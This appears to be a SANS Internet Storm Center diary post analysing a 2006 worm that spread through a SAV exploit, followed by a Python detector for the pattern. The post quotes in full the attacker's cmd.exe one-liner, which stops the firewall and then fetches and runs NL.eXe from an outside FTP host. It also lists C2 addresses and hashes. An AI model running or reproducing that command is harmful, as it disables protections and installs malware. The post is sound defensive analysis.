
SANS ISC: sav worm and its cc - SANS Internet Storm Center SANS ISC InfoSec Forums


sav worm and its cc
Thanks to John for this submission:

This file was being downloaded by a large number of machines that were recently exploited using the SAV remote exploit. The sequence of events for these compromises was:

Exploit comes in from IP address A (this IP varies)
Victim sends a Windows command prompt to 61.172.250.59 on tcp port 12345
61.172.250.59 responds with the following:
cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x&ftp.eXe -s:x&NL.eXe&del x"

Obviously, this command stops the Windows firewall service and creates an ftp command script named "x", which is then run by ftp.exe -s:x and downloads NL.eXe (from ftpd.3322.org 21211). The file is then executed, and then the x file is deleted.


Running the file through Virustotal gave limited information.

Complete scanning result of "NL.eXe", received in VirusTotal at 12.14.2006, 18:15:47 (CET). 
BitDefender 7.2 12.14.2006 DeepScan:Generic.Malware.IBdld!g.C9552284
CAT-QuickHeal 8.00 12.14.2006 (Suspicious) - DNAScan
eSafe 7.0.14.0 12.14.2006 Win32.Polipos.sus
Fortinet 2.82.0.0 12.14.2006 suspicious
Ikarus T3.1.0.26 12.14.2006 Trojan-Downloader.Win32.Zlob.and
Kaspersky 4.0.2.24 12.14.2006 no virus found
Norman 5.80.02 12.14.2006 W32/Suspicious_U.gen
Panda 9.0.0.4 12.13.2006 Suspicious file
Prevx1 V2 12.14.2006 Malicious
Sophos 4.12.0 12.14.2006 Mal/Behav-009
Sunbelt 2.2.907.0 11.30.2006 VIPRE.Suspicious
All others reported no virus found!

Aditional Information
File size: 12168 bytes
MD5: f538d2c73c7bc7ad084deb8429bd41ef
SHA1: 0eb52548a1c234cb2f8506a7c9a2e1a4547e9f8d
packers: UPACK
packers: embedded, UPack
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=70e962776070
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

John then reviewed his IDS logs, looking for traffic on port 5202, which appears to be the command and control port for this malware, and discovered traffic towards 61.172.146.94.
 
donald

206 Posts
ISC Handler
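
The download-and-run chain in the command quoted above can be recognised in process command-line logs. The following is an added example, not part of the original diary or of John's submission: it splits the one-liner on `&`, rebuilds the FTP script written by the echo redirections, and reports the server, the fetched file and whether that file was then executed. The function name `analyze` and the report keys are assumptions made for this example.

```python
import re

# Command line exactly as quoted in the diary; everything else here is illustrative.
SAMPLE = ('cmd.exe /c "Net Stop SharedAccess&cd %TEMP%&echo open ftpd.3322.org 21211>x'
          '&echo test>>x&echo test>>x&echo bin>>x&echo get NL.eXe>>x&echo bye>>x'
          '&ftp.eXe -s:x&NL.eXe&del x"')

STOP_RE = re.compile(r'^net\s+stop\s+(\S+)', re.I)
ECHO_RE = re.compile(r'^echo\s+(.*?)\s*(>>?)\s*(\S+)$', re.I)
FTP_RE = re.compile(r'^ftp(?:\.exe)?\s+.*?-s:(\S+)', re.I)
DEL_RE = re.compile(r'^del\s+(\S+)', re.I)

def analyze(cmdline):
    """Walk a cmd.exe '&' chain and rebuild any FTP script it echoes to disk.

    Simplification: splits on every '&' and ignores quoting and '^' escapes.
    """
    m = re.search(r'/c\s+"?(.*?)"?\s*$', cmdline, re.I)
    steps = [s.strip() for s in (m.group(1) if m else cmdline).split('&') if s.strip()]
    files = {}  # file name -> lines written to it by echo redirection
    r = {'stopped_services': [], 'ftp_server': None, 'downloads': [],
         'executed': [], 'deleted': []}
    for step in steps:
        if m := STOP_RE.match(step):
            r['stopped_services'].append(m.group(1))
        elif m := ECHO_RE.match(step):
            text, op, target = m.groups()
            if op == '>':            # '>' truncates, '>>' appends
                files[target] = []
            files.setdefault(target, []).append(text)
        elif m := FTP_RE.match(step):
            for line in files.get(m.group(1), []):  # replay the script ftp -s: reads
                parts = line.split() or ['']
                if parts[0].lower() == 'open' and len(parts) > 1:
                    port = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
                    r['ftp_server'] = (parts[1], port)
                elif parts[0].lower() == 'get' and len(parts) > 1:
                    r['downloads'].append(parts[-1])  # local name if given, else remote
        elif m := DEL_RE.match(step):
            r['deleted'].append(m.group(1))
        elif step.split()[0].lower() in {d.lower() for d in r['downloads']}:
            r['executed'].append(step.split()[0])
    # Flag the download-and-run pattern: a file fetched over scripted FTP is then launched.
    r['suspicious'] = bool(r['ftp_server'] and r['executed'])
    return r

if __name__ == '__main__':
    for key, value in analyze(SAMPLE).items():
        print(f'{key}: {value}')
```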
